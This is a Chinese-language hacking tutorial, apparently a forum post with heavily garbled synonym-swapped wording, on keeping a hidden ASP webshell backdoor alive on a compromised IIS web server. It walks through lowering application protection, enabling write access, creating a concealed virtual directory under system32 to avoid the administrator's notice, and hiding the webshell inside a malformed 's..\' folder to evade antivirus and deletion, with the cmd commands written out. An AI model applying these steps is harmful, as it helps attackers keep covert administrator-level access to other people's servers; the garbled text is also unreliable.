建造永不被杀的80端口后门

建造永不被杀的80端口后门参考lcx在x档案公布过长久不被杀的的方便之门，本人就试验起来,只有把asp跷跷板放到个中一个站点中某个深的目次中，再在internet 效劳处置器面当选着这个站点（比方默许处置站点）翻开窜改属性->主目次中，把“运用步调养护”中改为"低"，再在"写入""前方打入彀，在欣赏器中输出asp跷跷板路途，输出暗号此后加入处置页面，运转cmd吩咐还不妨加用户之类的居然是处置员权力，呵呵用后察觉还不错，自愿觉得就不错，并且上传文献都是在web过程上去着，并且再有体例权力，还感触如许创造肉鸡对立来说比拟安定就走了，厥后想不到然而几天这个方便之门过几就没了，欣赏上去什么都连asp跷跷板都没了，究竟如何回事？并且对方还搞了风火墙，只开21，80端口，眼汪汪丢去真怅然，可见处置员是发觉到了。看着我想有两个大概，一是asp跷跷板被杀，被处置员查到asp跷跷板就删了，二是谁人大概处置员看到这个站点的属性改了就xxx~~~~，你大概会说用站点属性窜改过的不妨“写入”来写个木赶快去，然而错了，处置员把默许处置站点都删了，大概者做其余窜改了，昏，从来好好的方便之门却成了比拟鲜明的表露给处置员看了，并且最新的asp也被会杀毒，可见个asp可见这种本领也是不太湮没，还须要矫正，遽然想到不妨经过厥后参考创造湮没网页，并且是假造目次不妨树立“运用步调养护”为低的，其余站点中的目次属性是不不妨树立如许的属性的，如许就不会表露internet 效劳处置器中任何窜改的征象了，（对于普遍的处置员来说，对于bt的我就不敢说了），ok咱们来第一步创造个湮没假造网页（同声也不妨做网页面面俱到）普遍情景下，即使在肉鸡上开网页的话，只有处置员察看一下iis处置器步调，就会创造咱们的网页，如许不只咱们的网页表露了，还大概会被处置员把咱们给踢出去。此刻天我教大师的本领是让处置员在iis处置器里创造不了本领。开始翻开肉机（本例中以本人的呆板为例）iis处置器，选定一个文献夹，而后点击右键，采用“资源处置器”，到网站的根目次下兴建一个文献夹kiss，而后到system32上兴建一个文献夹，我这边取名为myhome（这个文献夹尽管湮没的目次深少许，才不会被处置员创造），回到iis处置器按f5革新就会看到kiss这个目次，选中它后，点击右键，采用“兴建>假造目次”，咱们给主个假造目当选名kiss，而后把这个假造目次指向myhome，创造实行后，此刻放个首页进去，翻开欣赏器，输出http://127.0.0.1/kiss/kiss就该当不妨平常欣赏了！即使是肉鸡，把127.0.0.1换成肉鸡的ip地方就不妨了。接下来，翻开我的电脑，找到网站的根目次，是否想删掉kiss这个文献夹了？呵呵，别急！，回到iis的处置器革新窜改属性先，窜改属性-" >主目次中，把“运用步调养护”中改为"低"，再在"写入""前方打入彀，在欣赏器中输出asp跷跷板路途，输出暗号此后加入处置页面，运转cmd吩咐还不妨加用户之类的居然是处置员权力，如许做即是把asp放到system32/myhome目次下，比方你asp跷跷板是kiss.asp,那么放到system32/myhome目次后，欣赏http://127.0.0.1/kiss/kiss/kiss.asp 即是你asp跷跷板的路途了，让如许kiss这个目次没有了。而后翻开我的电脑，找到网站的根目次，删掉kiss这个文献夹，再翻开欣赏器输出方才的网址，嘿嘿，是否又翻开了，如何样，一个湮没的部分网页就如许创造实行了。如许就不重逢被处置员创造了吧，你不信就把iis的处置器关了，再加入居然是没有窜改的陈迹，如许也不妨创造网页，即使你说如许会减少你的网页伤害性，那你就从新创造个假造目次，不必我说了吧，再者即使再想窜改你的假造目次的属性的话不妨再在网站的根目次从新创造kiss目次，而后在iis的处置器就不妨看到你的站点了二让asp跷跷板不被杀你要说是窜改asp跷跷板个中代码大概加密等来隐藏杀毒，错了，这个不必你窜改，并且谁也不保护你窜改过的asp不被xx杀毒软硬件杀，归正我也是懒改，呵呵，咱们运转cmd，cd c:\winnt\system32\myhome下也。也即是你假造目次转向的地方，先说一下道理大师都领会在windows中“\”标记是路途的分割标记，比方“c:\windows\”的道理即是c分区中的windows文献夹，“c:\windows\system.exe”的道理即是c分区中的windows文献夹中的system.exe文献，好连接咱们假如一下：即使文献名中有“\”标记会如何样呢？假设“s\”是一个文献夹的名字，这个文献夹坐落：“f:\”，他的路途即是“f:\s\”，当咱们试图考察的功夫windows会缺点的觉得咱们要翻开的文献是c分区的s文献夹，如许windows就没辙翻开而且会归来一个缺点，由于之上的路途并不生存。大概你此刻正在试验创造“s\”文献，然而windows会提醒你：“\”标记是不许动作文献、文献夹的名字的。可见windows仍旧早已想到这一点了的。ok咱们连接举行，就不信不许创造包括“\”标记的文献。此刻翻开你的电脑，咱们要做少许很风趣的试验。加入windows后 点击：发端>运转 而后输出“cmd”并会车（即使是win98请输出“command”），这时候你会看到windows的吩咐遏制台，咱们即是要运用它实行咱们剩下的尝试，以次包括了很多吩咐个中{}中的字符是我的解释：microsoft windows xp [本子 5.1.2600](c) 版权一切 1985-2001 microsoft corp.c:\winnt\system32\myhome>mkdir s\ {咱们的第一次试验,截止windows只创造了s文献夹"\"被忽视掉了}c:\winnt\system32\myhome>mkdir s\s1\ {仍旧波折,windows先创造了s文献夹，而后在s内创造s1文献夹}c:\winnt\system32\myhome>mkdir s.\ {"s.\"被领会成s".\"又被忽视了}子目次或文献 s.\ 仍旧生存。 c:\winnt\system32\myhome>mkdir s..\ {毕竟胜利了,此刻你不妨在资源处置器看到"s."但却没辙翻开/简略}c:\winnt\system32\myhome>mkdir s...\ {又胜利了,在资源欣赏器能看到"s.."不妨翻开然而没辙简略}----------------------------------------------干什么会如许？咱们先说你看到的这个“s.”文献夹，他即不许翻开也不许简略，不许翻开是由于他的本质路途是“c:\winnt\system32\myhome\s..\”（咱们本人创造的以是不妨决定他的本质路途）然而在windows资源处置器中名字形成了“s.”也即是说当你试图翻开它的功夫windows本质上试验翻开“c:\winnt\system32\myhome\s.\”固然是不许翻开的，文献并不生存，以是windows会报错。不许简略也是由于这个，windows把一个本质生存的文献路途缺点的领会为一个不生存的路途，并举行xx作固然是没辙实行的。该说“s..”这个文献了，这个文献不妨翻开，然而却没辙简略。之类……翻开？你觉得windows真的是翻开了咱们创造的“s...\”文献了吗？咱们做底下的考查你就领会了。仍旧老规则{}是我的解释简单大师领会：----------------------------------------------microsoft windows xp [本子 5.1.2600](c) 版权一切 1985-2001 microsoft corp.c:\winnt\system32\myhome>copy net.asp s..\ {复制方才你的asp的跷跷板文献到“s..\”，资源处置器的“s.”}已复制 1 个文献。c:\winnt\system32\myhome>----------------------------------------------此刻回到你的资源处置器翻开“s.”文献夹，你看到了什么？“net.asp”文献如何会在这边？咱们方才简直复制到了“s.”呀？莫非咱们翻开“s.”文献夹本质上即是翻开了“s”？不错究竟即是如许。本来即使你再创造一个“s”文献夹的话“s.”就能翻开了，然而本质上翻开的是“s”。这是要害的话题了，本来咱们就运用s.目次不被杀的手段来湮没咱们的跷跷板，尽管跷跷板都毒，然而普遍来说的exe文献不许在s.如许的目次下运转的，然而asp跷跷板却不妨！不妨经过欣赏来实行cmd吩咐，把net.asp复制到s.目次后，把net.asp删了，咱们在欣赏器中http://127.0.0.1/kiss/kiss/s../net.asp 就不妨看到欣赏得asp跷跷板了到了，普遍用户基础不大概创造他，就算专科级的杀毒软硬件也只会去杀“s”而跳过“s..\”，好了那就说一下简略本领吧microsoft windows xp [本子 5.1.2600](c) 版权一切 1985-2001 microsoft corp.f:\test>dir启动器 f 中的卷是 bgting卷的序列号是 2c8e-fe1cf:\test 的目次2003-09-11 17:50 <dir> .2003-09-11 17:50 <dir> ..2003-09-11 18:35 <dir> s.2003-09-11 18:37 <dir> s..1 个文献 9 字节5 个目次 3,390,029,824 可用字节c:\winnt\system32\myhome>rmdir s..\目次不是空的。c:\winnt\system32\myhome>rmdir s..\ /ss..\, 能否确认(y/n)? yc:\winnt\system32\myhome>rmdir s...\ /ss...\, 能否确认(y/n)? y这也不必担忧搞坏你肉鸡了，好了如许一个很湮没的方便之门就创造了，并且不被杀，即使在肉鸡，上述要在3389举行尝试经过的。